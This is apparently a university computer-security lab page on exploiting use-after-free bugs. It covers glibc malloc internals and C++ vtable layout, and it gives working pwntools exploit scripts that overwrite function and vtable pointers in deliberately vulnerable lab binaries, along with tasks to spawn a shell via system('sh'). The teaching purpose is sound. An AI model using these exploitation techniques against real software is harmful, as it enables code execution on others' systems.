Lab 10 - Use After Free

Introduction

Use-after-free refers to a class of bugs in which the data from a memory region is still used after the region is freed. The most common causes of use-after-free bugs are:

  • Wrongly handled error conditions
  • Unaccounted for program states
  • Confusion over which part of the program is responsible for freeing the memory

Such bugs can have various adverse consequences:

  • crashes
  • corruption of valid data
  • arbitrary code execution

A use-after-free bug is exploitable if the program can be brought into a state in which it allocates new memory over the freed area. This gives the attacker control over what data is accessed after the free.

In terms of function calls on a Linux system, we, as attackers, need to force a malloc of the same or a similar size after the free. Under the right circumstances, the subsequent malloc will return the same pointer as the previous call (or a pointer to a region that overlaps the previous one).
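The reuse described above can be sketched with a toy allocator. This is only a model, not glibc: the ToyHeap class, its 16-byte size classes and the base address are hypothetical, chosen to mimic the last-in-first-out behaviour of per-size free lists.

```python
# Toy model only: real glibc malloc is far more complex. It mimics the
# LIFO reuse of freed chunks that belong to the same size class.
class ToyHeap:
    def __init__(self, base=0x1000):
        self.top = base      # next never-used address
        self.bins = {}       # chunk size -> stack of freed addresses
        self.sizes = {}      # address -> chunk size

    @staticmethod
    def chunk_size(request):
        # Round up to a 16-byte size class (simplified, hypothetical).
        return max(16, (request + 15) & ~15)

    def malloc(self, request):
        size = self.chunk_size(request)
        free_list = self.bins.get(size)
        if free_list:
            return free_list.pop()   # reuse the most recently freed chunk
        addr = self.top
        self.top += size
        self.sizes[addr] = size
        return addr

    def free(self, addr):
        self.bins.setdefault(self.sizes[addr], []).append(addr)


heap = ToyHeap()
victim = heap.malloc(40)       # object that will be freed too early
heap.free(victim)              # 'victim' is now a dangling address
attacker = heap.malloc(33)     # similar size, same size class as 40
other = heap.malloc(200)       # different size class, fresh address
print(hex(victim), hex(attacker), hex(other))
```

In this model the attacker's allocation lands exactly on the victim's address, while the allocation from a different size class does not.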

Heap Allocation

The standard method of allocating/freeing memory in a Linux C program is by using the malloc/free C library functions. The C++ equivalents are new and delete. The difference between malloc/free and new/delete is that new and delete, in addition to allocating memory, also call the constructor/destructor of the allocated type.

The innards of malloc aren't trivial to understand, so we will work with a general overview of what it does and how we can predict its behaviour in order to create a repeatable exploit.

The first thing worth mentioning is that not all addresses returned by malloc reside in what we call the heap.

malloc has 2 ways of allocating memory:

  • on the heap
    • a memory region in continuation of .data which can be resized with the brk and sbrk system calls
    • for small sizes (default is < 128 KB)
  • in the mmap region
    • generally between the heap and the stack, next to the shared libraries; done using the mmap system call
    • for large sizes (default is > 128 KB)

[Figure: the 2 regions, with the heap in red and the mmap region in green.]

When dealing with structures allocated on the heap we shouldn't dwell too much on the mmap case; most of the time, structures and classes are tens or hundreds of bytes in size.

The minimum allocation size is 4 * ptr_size (16 bytes on 32-bit and 32 bytes on 64-bit). Even malloc(0) returns a valid pointer to a region of minimum size.

The internal size (real size) is stored in memory immediately before the buffer returned by malloc. You can access it with some C magic:

void* ptr = malloc(100);
unsigned long size = ((unsigned long*)ptr)[-1] & ~7;

The & ~7 zeroes out the lowest 3 bits, which are flags and not part of the size. These bits are:

  • bit 0 - PREV_INUSE - This bit is set when previous chunk is allocated.
  • bit 1 - IS_MMAPPED - This bit is set when chunk is mmap’d.
  • bit 2 - NON_MAIN_ARENA - This bit is set when this chunk belongs to a thread arena.
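The size and flag arithmetic above can be checked with a short sketch. It assumes 64-bit glibc (an 8-byte size field and 16-byte alignment) and only covers chunks that are not mmapped; the function names are made up for illustration.

```python
SIZE_SZ = 8              # assumed: 64-bit glibc, the size field is 8 bytes
MALLOC_ALIGNMENT = 16    # assumed: 2 * SIZE_SZ
MIN_CHUNK_SIZE = 32      # 4 * pointer size, as stated above

PREV_INUSE = 0x1         # bit 0
IS_MMAPPED = 0x2         # bit 1
NON_MAIN_ARENA = 0x4     # bit 2


def internal_size(request):
    """Chunk size for a heap (non-mmapped) request: add the hidden size
    field, round up to the alignment, enforce the minimum."""
    size = (request + SIZE_SZ + MALLOC_ALIGNMENT - 1) & ~(MALLOC_ALIGNMENT - 1)
    return max(size, MIN_CHUNK_SIZE)


def decode_size_field(field):
    """Split the raw value stored before the buffer into size and flags."""
    return {
        "size": field & ~0x7,
        "prev_inuse": bool(field & PREV_INUSE),
        "is_mmapped": bool(field & IS_MMAPPED),
        "non_main_arena": bool(field & NON_MAIN_ARENA),
    }


print(internal_size(0), internal_size(100))
print(decode_size_field(0x71))
```

For malloc(100) this model gives an internal size of 112 (0x70), so a raw field of 0x71 decodes to size 112 with only PREV_INUSE set.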

When allocating on the heap malloc uses various other methods of allocating small data regions (arena based allocation with multiple bins of different sizes):

  • Fast bins
  • Unsorted bins
  • Small bins
  • Large bins

Check Understanding glibc malloc for more details.

Use the program from 00-malloc-addr to see how malloc behaves for different sizes. The program performs pairs of malloc + free to find the ranges of sizes for which the returned pointer stays the same. It also uses the trick shown above to read the real size and the flags.

Example output:

$ ./malloc_addr
Range [1, 504] with jump of 1:
Addr: 0x93b2a0; Size: 24 B; Internal size: 32 B; Count = 24
prev_inuse = 1; is_mmaped = 0; non_main_arena = 0
Addr: 0x93b2c0; Size: 40 B; Internal size: 48 B; Count = 16
prev_inuse = 1; is_mmaped = 0; non_main_arena = 0
Addr: 0x93b2f0; Size: 56 B; Internal size: 64 B; Count = 16
prev_inuse = 1; is_mmaped = 0; non_main_arena = 0
...
Addr: 0x93d190; Size: 504 B; Internal size: 512 B; Count = 16
prev_inuse = 1; is_mmaped = 0; non_main_arena = 0
 
Range [33554432, 33619967] with jump of 1024:
Addr: 0x7f67090a5010; Size: 32 MB; Internal size: 32 MB; Count = 4
prev_inuse = 0; is_mmaped = 1; non_main_arena = 0
...
Addr: 0x7f6709096010; Size: 32 MB; Internal size: 32 MB; Count = 4
prev_inuse = 0; is_mmaped = 1; non_main_arena = 0
 
Range [33554432, 33619967] with jump of 4096:
Addr: 0x7f67090a5010; Size: 32 MB; Internal size: 32 MB; Count = 1
prev_inuse = 0; is_mmaped = 1; non_main_arena = 0
...
Addr: 0x7f6709096010; Size: 32 MB; Internal size: 32 MB; Count = 1
prev_inuse = 0; is_mmaped = 1; non_main_arena = 0

What to look for:

  • internal size > size sent to malloc
  • internal size is at least size sent to malloc + 8 (the hidden size value)
  • for [0, 32] (internal) bytes the address will fall in the same place
  • for [32+16*k+1, 32+16*k+16] (internal) bytes the address will fall in the same place
  • for large sizes the is_mmaped bit is set
  • for large sizes, if the size is in the range of [x, x+PAGE_SIZE] it will fall in the same place
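The Count values in the first range of the example output can be reproduced with a small model. As before, this is a sketch that assumes 64-bit glibc and heap (non-mmapped) chunks; internal_size is a hypothetical helper, not part of the lab program.

```python
from collections import Counter


def internal_size(request):
    # Assumed 64-bit glibc: 8-byte size field, 16-byte alignment, 32-byte minimum.
    return max(32, (request + 8 + 15) & ~15)


# How many request sizes in [1, 504] share each internal chunk size?
counts = Counter(internal_size(request) for request in range(1, 505))

for size in sorted(counts)[:3]:
    print("Internal size: %d B; Count = %d" % (size, counts[size]))
print("Internal size: 512 B; Count = %d" % counts[512])
```

Requests 1 to 24 all map to the 32-byte chunk (Count = 24), and every following group of 16 request sizes shares one chunk size, which agrees with the listing above.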

For an in-depth understanding of how malloc works, check the Understanding glibc malloc article referenced above.

Dangling Pointers

A dangling pointer is a pointer variable that still refers to a memory region after that region has been freed. For example:

char* p = malloc(100); // memory allocated, p is valid
free(p); // p is freed
puts(p); // when puts is called p is a dangling pointer

When building an exploit based on a use-after-free bug, the most important aspect is the data type behind the dangling pointer(s). This determines how the attacker-injected data is interpreted. If the data structure doesn't influence the control flow of the program, the bug is unlikely to be exploitable for code execution.

When checking for use-after-free bugs we should also check which heap data points to code or is used in conditional statements (and so affects the control flow of the program).

struct a {
    int x;
    int y;
};
 
struct b {
    int id;
    void (*foo)(void);
};
 
...
struct a* a;
struct b* b;
...
printf("%d %d\n", a->x, a->y);
...
b->foo();

Out of the 2 structures above we should aim to create a dangling pointer of type struct b because it contains a code pointer.
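To see why the type matters, the sketch below interprets the same 16 attacker-controlled bytes as both structures. The layouts are assumptions for x86-64 Linux (4-byte int, 8-byte pointer, 4 bytes of padding after id), and the byte pattern is arbitrary.

```python
import struct

# Layouts assumed for x86-64 Linux.
STRUCT_A = struct.Struct("<ii")     # int x; int y;
STRUCT_B = struct.Struct("<i4xQ")   # int id; 4 bytes padding; void (*foo)(void);

# 16 attacker-controlled bytes written over the freed region.
data = struct.pack("<Q", 0x4142434445464748) * 2

x, y = STRUCT_A.unpack(data[:STRUCT_A.size])
obj_id, foo = STRUCT_B.unpack(data[:STRUCT_B.size])

print("as struct a: x=%#x y=%#x" % (x, y))            # only changes printed numbers
print("as struct b: id=%#x foo=%#x" % (obj_id, foo))  # foo is where b->foo() jumps
```

Seen as struct a, the bytes only change two printed integers; seen as struct b, the last 8 bytes become the target of the indirect call.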

Tutorial

Enter the 00-c-tutorial/ directory and check the source code for bugs.

We can see that in the default case of the switch the object is freed but the program continues:

...
default:
    printf("Invalid command\n");
    free(p);
...

The post_action_msg buffer is conveniently allocated with a size similar to that of struct person, and fgets is used to read data into the newly allocated buffer.

We also notice the members of struct person:

struct person {
    void (*action_func)(struct person*); // ԅ(≖‿≖ԅ)
    char name[32];
};

It contains a code pointer which we can overwrite in our exploit.
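A quick sketch of the layout shows which bytes of our input matter. It assumes x86-64 (8-byte function pointer, no padding); fake_person is a hypothetical helper and the address used is just a recognizable pattern.

```python
import struct

# struct person on x86-64 (assumed): 8-byte function pointer + char name[32].
PERSON = struct.Struct("<Q32s")


def fake_person(func_addr, name=b""):
    """Bytes that, written over a freed struct person, replace action_func."""
    return PERSON.pack(func_addr, name)


payload = fake_person(0x4141414141414141)
print(hex(PERSON.size))   # total size of the structure
print(payload[:8])        # the bytes that overlap action_func
```

The computed size is 0x28, so a buffer of a similar size falls in the same size class as struct person, and only the first 8 bytes of input are needed to control action_func.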

First, let's validate that both calls to malloc return the same address. The returned address should be in the $rax register after the call.

   0x4011c8 <main+4>:   sub    rsp,0x20
   0x4011cc <main+8>:   mov    edi,0x28
   0x4011d1 <main+13>:  call   0x401090 <malloc@plt>
=> 0x4011d6 <main+18>:  mov    QWORD PTR [rbp-0x10],rax
...
gdb-peda$ p/x $rax
$1 = 0x4052a0

Give the program appropriate input so that it reaches the default case. In the following example I send random_name to the first fgets and 3 (which is an invalid case) to fgetc.

...
   0x401209 <main+69>:  mov    esi,0x20
   0x40120e <main+74>:  mov    rdi,rcx
=> 0x401211 <main+77>:  call   0x401080 <fgets@plt>
gdb-peda$
random_name
 
...
   0x401257 <main+147>: mov    rax,QWORD PTR [rip+0x2e02]        # 0x404060 <stdin@@GLIBC_2.2.5>
   0x40125e <main+154>: mov    rdi,rax
=> 0x401261 <main+157>: call   0x401070 <fgetc@plt>
gdb-peda$
3

Eventually we reach the call to free.

...
   0x4012b7 <main+243>: mov    rax,QWORD PTR [rbp-0x10]
   0x4012bb <main+247>: mov    rdi,rax
=> 0x4012be <main+250>: call   0x401030 <free@plt>

We see that the second malloc returns the same address.

...
   0x4012c3 <main+255>: mov    edi,0x28
   0x4012c8 <main+260>: call   0x401090 <malloc@plt>
=> 0x4012cd <main+265>: mov    QWORD PTR [rbp-0x8],rax
gdb-peda$ p/x $rax
$2 = 0x4052a0

Send some random input to fgets to overwrite the function pointer.

   0x4012e8 <main+292>: mov    esi,0x28
   0x4012ed <main+297>: mov    rdi,rax
=> 0x4012f0 <main+300>: call   0x401080 <fgets@plt>
gdb-peda$
AAAAAAAA

Afterwards we reach the following code, where the program tries to call rdx. If we print the register, we see that its value coincides with the 8 bytes read by the previous fgets.

   0x4012fc <main+312>: mov    rax,QWORD PTR [rbp-0x10]
   0x401300 <main+316>: mov    rdi,rax
=> 0x401303 <main+319>: call   rdx
gdb-peda$ p/x $rdx
$3 = 0x4141414141414141

Put it all together and replace “AAAAAAAA” with the address of bad_func to create an appropriate exploit. pwntools code below:

from pwn import *

elf = ELF('./c_tut')
io = process('./c_tut')
io.sendline(b"name")  # first fgets: the person's name
io.sendline(b"3")     # invalid command, reaches the default case (free)
io.sendline(p64(elf.symbols['bad_func']))  # lands over action_func

io.interactive()
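One caveat worth checking before sending a packed address: fgets stops reading after a newline, so a 0x0a byte inside the payload would cut it short. The sketch below uses a standard-library stand-in for p64; both addresses are hypothetical examples, not values taken from the binary.

```python
import struct


def p64(value):
    # Stand-in for pwntools' p64: 8-byte little-endian packing.
    return struct.pack("<Q", value)


def survives_fgets(payload):
    """fgets stops after the first newline, so the payload must not contain 0x0a."""
    return b"\n" not in payload


# Hypothetical addresses, for illustration only.
print(survives_fgets(p64(0x401196)))   # True: no newline byte in the address
print(survives_fgets(p64(0x40110a)))   # False: the low byte is 0x0a
```

NUL bytes are not a problem here, since fgets keeps reading past them.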

Virtual Function Tables

Though function pointers inside structures may seem a bit esoteric in C code, in object-oriented languages (like C++) they are standard practice, but they are overlooked due to the added layers of abstraction. Most of the time, C programs that use these kinds of structures are trying to emulate an object-oriented style.

In object-oriented languages, virtual method tables (or virtual function tables) are used to facilitate polymorphism and inheritance. An object contains a pointer to a list of functions (only the virtual ones), so that it keeps the methods of its own type even when it is cast to a type higher up in the inheritance tree.

C++ objects memory layout

class B {
  int a, b;
public:
  virtual void f(void);
};
 
class B1 {
  int x, y;
public:
  virtual void z(void);
};
 
class D: public B, public B1 {
  int c, d;
public:
  void f(void);
  void z(void);
};
 
int main()
{
  D objD; B1 * ptrB1;
  ptrB1 = &objD;
  ptrB1->z();
}

Let's look at how a C++ object such as objD is laid out in memory. The object is a compound of its parents' members and its own. As class D overrides both virtual functions f and z, the virtual tables inside D will contain its own methods.

When doing an upcast (a cast to a parent class), the pointer is just offset to the correct subobject (e.g. when casting to B1, ptrB1 will start from PVTable1, the vtable pointer of the B1 subobject).

With multiple inheritance, the C++ standard does not mandate a specific order for the base subobjects inside the object; the order is chosen by the compiler and its ABI.

We can also use the compiler to see the data layout. Copy the code above into a file dummy.cpp.

Then run:

$ clang -cc1 -fdump-record-layouts dummy.cpp
 
*** Dumping AST Record Layout
         0 | class B
         0 |   (B vtable pointer)
         8 |   int a
        12 |   int b
           | [sizeof=16, dsize=16, align=8,
           |  nvsize=16, nvalign=8]
 
*** Dumping AST Record Layout
         0 | class B1
         0 |   (B1 vtable pointer)
         8 |   int x
        12 |   int y
           | [sizeof=16, dsize=16, align=8,
           |  nvsize=16, nvalign=8]
 
*** Dumping AST Record Layout
         0 | class D
         0 |   class B (primary base)
         0 |     (B vtable pointer)
         8 |     int a
        12 |     int b
        16 |   class B1 (base)
        16 |     (B1 vtable pointer)
        24 |     int x
        28 |     int y
        32 |   int c
        36 |   int d
           | [sizeof=40, dsize=40, align=8,
           |  nvsize=40, nvalign=8]
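The offsets in the dump for class D can be reproduced with a simple model. This is a simplified sketch, not the actual ABI algorithm: it places fields in order and aligns each one, assuming x86-64 sizes (8-byte vtable pointers, 4-byte ints). The layout helper and field names are made up for illustration.

```python
def layout(fields):
    """fields: list of (name, size, align). Returns (offsets, total size)."""
    offset, max_align, offsets = 0, 1, {}
    for name, size, align in fields:
        offset = (offset + align - 1) & ~(align - 1)   # align the field
        offsets[name] = offset
        offset += size
        max_align = max(max_align, align)
    total = (offset + max_align - 1) & ~(max_align - 1)  # pad to the alignment
    return offsets, total


PTR, INT = (8, 8), (4, 4)   # (size, align), assumed for x86-64
D_FIELDS = [
    ("B vptr", *PTR), ("a", *INT), ("b", *INT),      # B subobject
    ("B1 vptr", *PTR), ("x", *INT), ("y", *INT),     # B1 subobject
    ("c", *INT), ("d", *INT),                        # D's own members
]

offsets, size = layout(D_FIELDS)
for name, off in offsets.items():
    print("%2d | %s" % (off, name))
print("sizeof =", size)
```

The offset of the B1 vtable pointer (16) is also the amount by which a D* is adjusted when it is upcast to B1*.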

Tutorial

Go to the 00-cpp-tutorial/ directory and look at the source code.

The bug is related to an error check prematurely deleting the object:

A *a = new A(x);
 
if (x < 0)
    delete a;  // <- pointer is deleted
...
std::cout << header << ":" << a->negate() << "\n"; // <- object still used

Before calling the object method a new buffer is allocated and read:

char *header = new char[16];
std::cin.getline(header, 16);

Remember that virtual functions exist in a virtual function table so we not only need the address of a target function to call, but also the address of an array containing the function address.

Luckily the program already provides an array containing bad_func:

void (*func_list[3])(uint64_t) = { bad_func };

Remember that non-static class methods take an implicit this argument:

class Foo {
    void bar(int x, int y);
};

Here the bar method effectively takes 3 arguments (this, x and y). Translated to C:

struct Foo {
    void (*bar)(struct Foo*, int, int);
};

Let's check how the method call is done in assembly:

   ...
   0x0000000000401259 <+92>:    mov    rdi,rbx                  <- first arg (this)
   0x000000000040125c <+95>:    call   0x40138c <A::A(int)>     <- constructor
   0x0000000000401261 <+100>:   mov    QWORD PTR [rbp-0x28],rbx <- pointer stored on stack
   ...
   0x00000000004012e2 <+229>:   mov    rax,QWORD PTR [rbp-0x28] <- get pointer from stack
   0x00000000004012e6 <+233>:   mov    rax,QWORD PTR [rax]      <- get VFT (offset 0 in class)
   0x00000000004012e9 <+236>:   mov    rdx,QWORD PTR [rax]      <- get VFT[0] (negate method)
   0x00000000004012ec <+239>:   mov    rax,QWORD PTR [rbp-0x28] <- get pointer from stack
   0x00000000004012f0 <+243>:   mov    rdi,rax                  <- first arg (this)
   0x00000000004012f3 <+246>:   call   rdx                      <- call negate(this)
   ...
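The two dereferences in the listing above can be modelled with a dictionary standing in for memory. This is only a sketch: FUNC_LIST and BAD_FUNC are hypothetical addresses, and OBJ reuses the object address seen in the gdb session of this tutorial.

```python
def virtual_call(memory, this, slot=0):
    """Model of the dispatch sequence: two loads, then an indirect call."""
    vft = memory[this]                  # mov rax, [rax]: VFT pointer at offset 0
    target = memory[vft + 8 * slot]     # mov rdx, [rax]: VFT[slot]
    return target                       # call rdx (with rdi = this)


FUNC_LIST = 0x404090   # hypothetical address of an array of function pointers
BAD_FUNC = 0x401196    # hypothetical address of the target function
OBJ = 0x4176d0         # address of the freed object

memory = {
    FUNC_LIST: BAD_FUNC,   # func_list[0] = bad_func
    OBJ: FUNC_LIST,        # attacker data over the object's first 8 bytes
}

print(hex(virtual_call(memory, OBJ)))
```

Writing the address of bad_func directly over the object would not work in this model: the second load would then read from the function's address instead of from a table entry.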

As in the C tutorial, check that the second allocation returns the same address as the first (if we input -1, so that the object is deleted):

gdb-peda$ b *0x401251
gdb-peda$ c
Continuing.
Enter a number: -1
    ...
   0x40124c <main+79>:  call   0x401090 <operator new(unsigned long)@plt>
=> 0x401251 <main+84>:  mov    rbx,rax
gdb-peda$ p/x $rax
$1 = 0x4176d0
gdb-peda$ b *0x4012a1
gdb-peda$ c
    ...
   0x40129c <main+159>: call   0x401030 <operator new[](unsigned long)@plt>
=> 0x4012a1 <main+164>: mov    QWORD PTR [rbp-0x20],rax
gdb-peda$ p/x $rax
$2 = 0x4176d0

Use the following script to get the program to call bad_func:

from pwn import *

elf = ELF('./cpp_tut')
io = process('./cpp_tut')
io.sendline(b"-1")  # negative number, so the object is deleted
io.sendline(p64(elf.symbols['func_list']))  # fake VFT pointer, read into header

io.interactive()

Output:

$ python2 exploit.py
[*] '/home/student/cns/10-UAF/00-cpp-tutorial/cpp_tut'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process './cpp_tut': pid 29763
[*] Switching to interactive mode
[*] Process './cpp_tut' stopped with exit code 0 (pid 29763)
Enter a number:Read a header:\x90@@:Your 'this' pointer = 0x15c72d0
32
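The odd-looking header in the output is simply our packed pointer printed as a C string. The sketch below assumes func_list sits at 0x404090, a value inferred from the "\x90@@" bytes in the output and not read from the binary.

```python
import struct

# Assumption: inferred from the "\x90@@" header printed in the output.
func_list_addr = 0x404090

payload = struct.pack("<Q", func_list_addr)   # what p64() would send
header = payload.split(b"\x00", 1)[0]         # a C string ends at the first NUL

print(payload)
print(header)
```

Bytes 0x40 are the ASCII character '@', so the three non-zero bytes of the address show up as \x90@@ before the first NUL terminates the string.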

Tasks

All content necessary for the CNS laboratory tasks can be found in the CNS public repository.

List Printer - C++

Go to the 01-list-printer/ directory and examine the code/binary to find the use-after-free bug. Create an exploit to run a shell.

Point - C

Go to the 02-point/ directory and examine the code/binary to find the use-after-free bug. Create an exploit to run system(“sh”).

The program never checks if the id corresponds to an existing point.

Look at the structs: how would a struct point3D overlap a struct point2D?

       point2D               point3D
  +---------------+     +---------------+
  |   x   |   y   |     |   x   |   y   |
  +---------------+     +---------------+
  |  vector_len   |     |   z   |   0   |
  +---------------+     +---------------+
                        |  vector_len   |
                        +---------------+

If we check the address of system@plt it should have 3 non-0 bytes so it can be overwritten with the value of z.

gdb-peda$ info address system@plt
Symbol "system@plt" is at 0x401070 in a file compiled without debugging.

How to send the “sh” argument to system?

The function will be called with a pointer to the structure itself:

point_list_2d[id]->vector_len(point_list_2d[id]);

Let's pretend the pointer is cast to char*. The string will be formed from the concatenated raw bytes of the structure (up to the first \x00). It should be enough to set x to the integer obtained by unpacking the bytes “sh\x00\x00”.
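The values involved can be worked out with a short sketch. It assumes 4-byte little-endian ints and the overlap shown in the diagram above (z and the following 4 zero bytes covering vector_len of a point2D); how the numbers are actually fed to the program is left to the exploit.

```python
import struct

# x must hold the bytes "sh\0\0" when the struct is read as a C string.
x = struct.unpack("<I", b"sh\x00\x00")[0]

# z overlaps the low 4 bytes of point2D's vector_len (see the diagram above).
z = 0x401070   # system@plt, from the gdb output above

# First 16 bytes of the point3D: x, y, z and 4 zero bytes.
raw = struct.pack("<iiii", x, 0, z, 0)

as_string = raw.split(b"\x00", 1)[0]             # what system() would receive
vector_len = struct.unpack("<Q", raw[8:16])[0]   # pointer seen through point2D

print(x, hex(x))
print(as_string, hex(vector_len))
```

With these values the dangling point2D sees vector_len = system@plt, and the structure itself, read as a string, is "sh".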

Resources

cns/labs/lab-10.txt · Last modified: 2021/01/11 16:59 by mihai.dumitru2201
CC Attribution-Share Alike 3.0 Unported